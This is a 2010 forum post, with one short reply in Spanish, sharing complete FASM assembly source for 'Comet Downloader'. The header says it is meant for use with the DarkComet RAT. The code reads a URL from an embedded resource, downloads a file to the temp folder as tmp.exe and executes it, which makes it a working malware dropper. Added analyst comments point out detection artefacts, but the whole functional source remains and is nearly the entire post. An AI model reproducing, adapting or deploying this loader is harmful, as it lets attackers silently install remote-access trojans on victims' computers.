
CometDownloader (ASM)

Publicado: 30 Sep 2010, 19:31
por Kodeinfect


;-----------------------------------;
;     Comet Downloader [FASM]      -;
; Author : DarkCoderSc             -;
; Mail : [email protected]  -;
;----------------------------------------------------------------------;
; Size = 2048o (2ko)                                                  -;
; Server Editor include it will read the resource %URL% in RT_RCDATA  -;
; This sample example will be used on DarkComet-RAT !                 -;
;----------------------------------------------------------------------;

; Output format: Windows PE image, GUI subsystem, subsystem version 4.0.
Format PE GUI 4.0

; Execution begins at the `start` label in the code section.
entry start  

; FASM Win32 ANSI header set; the invoke/library/import macros used below come from it.
; The path is absolute and specific to the author's machine.
include 'c:\FASMW168\include\win32a.inc'

;Var data section rw-------------------------------------
; Analyst note: 'open', 'tmp.exe' and '%URL%' are stored here as plain
; zero-terminated ANSI literals, so a strings scan of the image shows them.
section '.data' data readable writeable 

;Const Values--------------------
CMD_OPEN   db 'open',0          ; verb string passed to ShellExecute
filep      db 'tmp.exe',0       ; file name appended to TmpDir
;Uninitialized values------------
handle     dd ?                 ; GetModuleHandle(0) result; not read again in this listing
hRes       dd ?                 ; FindResource result
hReturn    dd ?                 ; LoadResource result
sRes       dd ?                 ; SizeofResource result (byte count of the resource)
pRes       dd ?                 ; LockResource result (pointer to the resource bytes)
Res        db ?                 ; not referenced in this listing
SzBuf      dd ?                 ; not referenced in this listing
;Server Editor Values------------
RC_STR0    db '%URL%',0         ; name of the RT_RCDATA resource looked up at startup
TmpDir     rb 256d              ; 256-byte buffer used for the temp directory and then the full file path
;--------------
url        db ?                 ; single reserved byte; destination label of the resource copy
path       db ?                 ; single reserved byte; not referenced in this listing

;Code section--------------------------------------------
section '.code' code readable executable

;Entry point---------------------------------------------
; Flow, in order: look up the RT_RCDATA resource named '%URL%', copy its
; bytes to `url`, fill TmpDir via GetTempPath, append 'tmp.exe', delete any
; file already at that path, download `url` to that path, then open the
; file with ShellExecute and exit.
; No return value is tested anywhere in this listing: each call is made
; regardless of whether the previous one succeeded.
; Analyst note: nothing here checks the downloaded content before it is
; opened. Artefacts visible from this listing are the RT_RCDATA resource
; named '%URL%', a file named tmp.exe under the temp path, and a child
; process started from that file. Confirm actual run-time behaviour in a
; sandbox rather than from the listing alone.
start:
     invoke GetModuleHandle,0
     mov [handle],eax                             ; stored, but not used by any later call here
     ;Server Settings n1---------------------------------
     ; NULL module handle: the resource is looked up in the image of the running process.
     invoke FindResource,NULL,RC_STR0,RT_RCDATA
     mov [hRes],eax
     invoke LoadResource,NULL,[hRes]
     mov [hReturn],eax
     invoke SizeofResource,NULL,[hRes]
     mov [sRes],eax
     invoke LockResource,[hReturn]
     mov [pRes],eax
     ; Copies sRes bytes from the resource to the `url` label. The count comes
     ; from the resource; `url` itself reserves one byte in the data section.
     invoke movememory,url,[pRes],[sRes]
     invoke FreeResource,[hReturn]
     xor eax, eax                                 ; eax cleared; not read before the next call
     ;Resolve the temp directory-------------------------
     ; Both arguments are the address of TmpDir.
     invoke GetTempPath,TmpDir,TmpDir
     ;Create The Final Path------------------------------
     invoke strcat,TmpDir,filep                   ; TmpDir += 'tmp.exe'
     ;Now Download---------------------------------------
     invoke DeleteFile,TmpDir                     ; removes any existing file at the target path
     invoke URLDownloadToFile,0,url,TmpDir,0,NULL ; fetches `url` and writes it to the TmpDir path
     invoke ShellExecute,0,CMD_OPEN,TmpDir,0,0,SW_SHOW ; 'open' verb on the downloaded file
exit:
     invoke ExitProcess,0                         ; always exits with code 0

;Import data section-------------------------------------
; Analyst note: every name listed here ends up in the PE import table whether
; or not the code calls it. In this listing lstrcpy, ZeroMemory and MessageBox
; are imported but never invoked, so import-based signatures will still see them.
section '.idata' import data readable

;Dll names-------------------------------
library urlmon,'URLMON.DLL',\
        Shell32,'SHELL32.DLL',\
        Kernel32,'KERNEL32.DLL',\
        User32,'USER32.DLL'

; Download API (ANSI variant).
import urlmon,\
       URLDownloadToFile,'URLDownloadToFileA'

; Launch API (ANSI variant).
import Shell32,\
       ShellExecute,'ShellExecuteA'

; Resource, memory, string, path and file APIs. `movememory` and `strcat` are
; local aliases for RtlMoveMemory and lstrcat.
import Kernel32,\
       GetModuleHandle,'GetModuleHandleA',\
       FindResource,'FindResourceA',\
       LoadResource,'LoadResource',\
       SizeofResource,'SizeofResource',\
       LockResource,'LockResource',\
       lstrcpy,'lstrcpy',\
       ExitProcess,'ExitProcess',\
       movememory,'RtlMoveMemory',\
       FreeResource,'FreeResource',\
       ZeroMemory,'RtlZeroMemory',\
       strcat,'lstrcat',\
       GetTempPath,'GetTempPathA',\
       DeleteFile,'DeleteFileA'

; Imported but not called anywhere in this listing.
import User32,\
       MessageBox,'MessageBoxA'

Re: CometDownloader (ASM)

Publicado: 01 Oct 2010, 17:15
por linkgl
Es básicamente un downloader con puras apis y almacena los datos en el res! xD